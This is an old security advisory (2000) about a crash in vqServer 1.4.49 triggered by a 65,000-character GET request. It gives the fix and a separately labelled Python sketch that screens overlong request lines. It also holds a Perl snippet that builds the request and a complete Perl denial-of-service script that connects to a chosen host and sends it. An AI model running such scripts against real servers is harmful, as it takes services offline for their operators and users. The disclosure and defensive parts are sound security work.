Title: D.o.S in vqServer
Released by: DHC
Date: 27th August 2000
DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - auto45040@hushmail.com)

/-|=[explanation]=|-\
Sending vqServer version 1.4.49 a malformed URL request crashes the
service. This has been verified on the Windows version, but the
linux/unix version and prior versions are probably affected too.



/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:

GET /AAA (hit return =)

where AAA stands for 65000 characters. Since neither Internet Explorer
nor Netscape lets you paste that many characters into the address field
(www.server.com/AAA), you will have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:

open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);

Then it's just a cut and paste.
Or you can use the example code below.



/-|=[fix]=|-\
The latest edition of vqServer (1.9.47) is unaffected by this. It is
available for download at www.vqsoft.com
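
The test request above is a single request line of about 65000 bytes. As an added example (not part of the DHC advisory and not vqSoft's code), this Python sketch shows the defensive counterpart for a front end or server you maintain: read the request line with a hard byte cap and answer 414 instead of buffering whatever arrives. The function name, the 8190-byte cap and the sample inputs are assumptions made for the illustration.

```python
import io

MAX_REQUEST_LINE = 8190  # assumed cap in bytes, terminator included; tune per application


def screen_request_line(stream, limit=MAX_REQUEST_LINE):
    """Screen one HTTP request line read from a binary stream.

    Returns (status, detail): 200 with the request target, 400 for a
    malformed line, 414 when the line does not fit in `limit` bytes.
    """
    # Bounded read: at most limit + 1 bytes are ever buffered, however
    # much the client sends before its newline.
    line = stream.readline(limit + 1)
    if len(line) > limit:
        # Do not read the remainder; answer 414 and close the connection.
        return 414, "request line longer than %d bytes" % limit
    if not line.endswith(b"\n"):
        return 400, "connection closed before end of request line"
    parts = line.rstrip(b"\r\n").split(b" ")
    # Two fields is the HTTP/0.9 form ("GET /path"); three adds the version.
    if len(parts) not in (2, 3) or not parts[0].isalpha():
        return 400, "malformed request line"
    if len(parts) == 3 and not parts[2].startswith(b"HTTP/"):
        return 400, "malformed protocol version"
    target = parts[1]
    # Simplification: this sketch accepts only origin-form targets ("/path").
    if not target.startswith(b"/"):
        return 400, "request target is not an absolute path"
    return 200, target.decode("latin-1")


# Constructed sample inputs, not captured traffic.
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\n",
    "http09": b"GET /index.html\n",
    "overlong": b"GET /" + b"A" * 65000 + b"\n",
    "truncated": b"GET /index.html",
    "garbage": b"\x00\x01\x02\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        status, detail = screen_request_line(io.BytesIO(raw))
        print("%-9s -> %d %s" % (name, status, detail))
```

The same function works on a live connection when given `conn.makefile("rb")`; logging each 414 with the client address gives a simple signal for requests of this shape.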



/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a
large number of characters. The Windows version needed a reinstall every
five or so crashes. A reboot or total shutdown did not help.



/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.

#!/usr/bin/perl
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (auto45040@hushmail.com)
#
# code by: sinfony    (chinesef00d@hotmail.com)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
#  dude piffy stfu i bet you don't even know how to exploit it

die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host>\n"
if $#ARGV != 0;

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";

$a = "A";
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck);





